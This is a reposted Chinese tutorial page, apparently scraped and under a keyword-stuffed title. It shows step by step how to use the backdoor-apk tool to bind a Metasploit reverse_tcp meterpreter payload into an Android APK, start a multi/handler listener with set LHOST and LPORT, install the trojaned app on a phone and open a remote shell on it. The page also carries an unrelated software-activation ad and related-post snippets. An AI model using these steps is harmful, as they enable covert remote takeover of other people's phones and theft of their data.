Root apk 2021_proguard混淆jar包

Root apk 2021_proguard混淆jar包backdoor-apk从名字上我们就能知道它的用途了,没错就是用来制作APK后门的。这款工具使用起来非常方便,而且功能也很强大!话不多说,下面我们直接进入正题。首先,让我们对它进行安装,在安装前我们需要先安装它的一些依赖lib库文件:apt-getinstalllib32stdc++6lib32ncurses5lib32z1这里询问我们,对这些安装的服务,当他们更新时不再进行询…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

backdoor-apk 从名字上我们就能知道它的用途了,没错就是用来制作 APK 后门的。这款工具使用起来非常方便,而且功能也很强大!话不多说,下面我们直接进入正题。

首先,让我们对它进行安装,在安装前我们需要先安装它的一些依赖 lib 库文件:

apt-get install lib32stdc++6 lib32ncurses5 lib32z1

890f7051d459

这里询问我们,对这些安装的服务,当他们更新时不再进行询问。我们选择 Yes 即可!

890f7051d459

在完成以上依赖库的安装后接着我们就可以安装 backdoor-apk 啦!

git clone https://github.com/dana-at-cp/backdoor-apk.git

890f7051d459

下载完成后我们进入到其文件目录下:

cd backdoor-apk/

cd backdoor-apk/

890f7051d459

在当前目录下,我们可以看到一个脚本文件。这里,我们需要提前准备一个用来绑定后门的 APK 文件。

./backdoor-apk.sh /root/secist.apk

选择 3 payload

LHOST:192.168.15.131

LPORT:4444

890f7051d459

成功执行以上操作后,会生成一个绑定后门的 secist.apk 文件,默认被保存在 backdoor-apk>>original>>dist目录下!下面我们来启动侦听:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.15.131

set lport 4444

exploit

890f7051d459

同时,我将生成的带有后门的 APK 发送至我的手机,并进行安装打开!

890f7051d459

890f7051d459

很快我们可以看到,我已经取得了手机的 meterpreter shell!

890f7051d459

简单输入一个,查看系统信息的命令:

sysinfo

可以看到目标系统为 安卓6 版本,内核为 linux 3.10.49 架构为 armv7l 。

890f7051d459

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/171257.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • 如何修改系统内核版本名称_linux系统查看内核

    如何修改系统内核版本名称_linux系统查看内核更改系统内核版本系统中安装了多个内核版本,一般重启会根据配置文件的启动顺序,选择一个,怎样选择自己想要的版本?直接修改/etc/grub2.cfg里的序号即可找到对应的menuentry的序号,从0开始编号 最后重启一下即可查看内核版本:uname-a…

    2022年8月23日
    10
  • imread怎么读取图片_opencv读不到图片

    imread怎么读取图片_opencv读不到图片Matimage_source=imread(“D:\program\xie.png”)直接放入图片的绝对路径只需要把图像文件放在工程文件夹下和.cpp文件放在一起就行了,读取的时候就可以直接用名字读取,如imread(“miao.jpg”);src=imread(argv[1],1);方法是:工程——属性——配置属性——调试——命令行参数,然后设置就行了。argv[1…

    2022年10月14日
    3
  • 【android】在eclipse中查看genymotion模拟器的sd卡文件夹

    【android】在eclipse中查看genymotion模拟器的sd卡文件夹

    2022年2月4日
    49
  • Nginx简单防御CC攻击的两种方法

    Nginx简单防御CC攻击的两种方法CC 攻击可以归为 DDoS 攻击的一种 他们之间都原理都是一样的 即发送大量的请求数据来导致服务器拒绝服务 是一种连接攻击 CC 攻击又可分为代理 CC 攻击 和肉鸡 CC 攻击 代理 CC 攻击是黑客借助代理服务器生成指向受害主机的合法网页请求 实现 DOS 和伪装就叫 cc ChallengeCol 而肉鸡 CC 攻击是黑客使用 CC 攻击软件 控制大量肉鸡 发动攻击 相比来后者比前者更难防御 因为肉鸡可以

    2026年1月22日
    1
  • Wireshark抓包详解[通俗易懂]

    Wireshark抓包详解[通俗易懂]简述wireshark是非常流行的网络封包分析工具,功能十分强大。可以截取各种网络封包,显示网络封包的详细信息。使用wireshark的人必须了解网络协议,否则就看不懂wireshark了。为了安全考虑,wireshark只能查看封包,而不能修改封包的内容,或者发送封包。 wireshark能获取HTTP,也能获取HTTPS,但是不能解密HTTPS,所以wireshar

    2025年9月25日
    8
  • Window日志分析

    Window日志分析0x01基本设置A、Windows审核策略设置前提:开启审核策略,若日后系统出现故障、安全事故则可以查看系统的日志文件,排除故障,追查入侵者的信息等。打开设置窗口WindowsServer

    2022年7月3日
    24

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号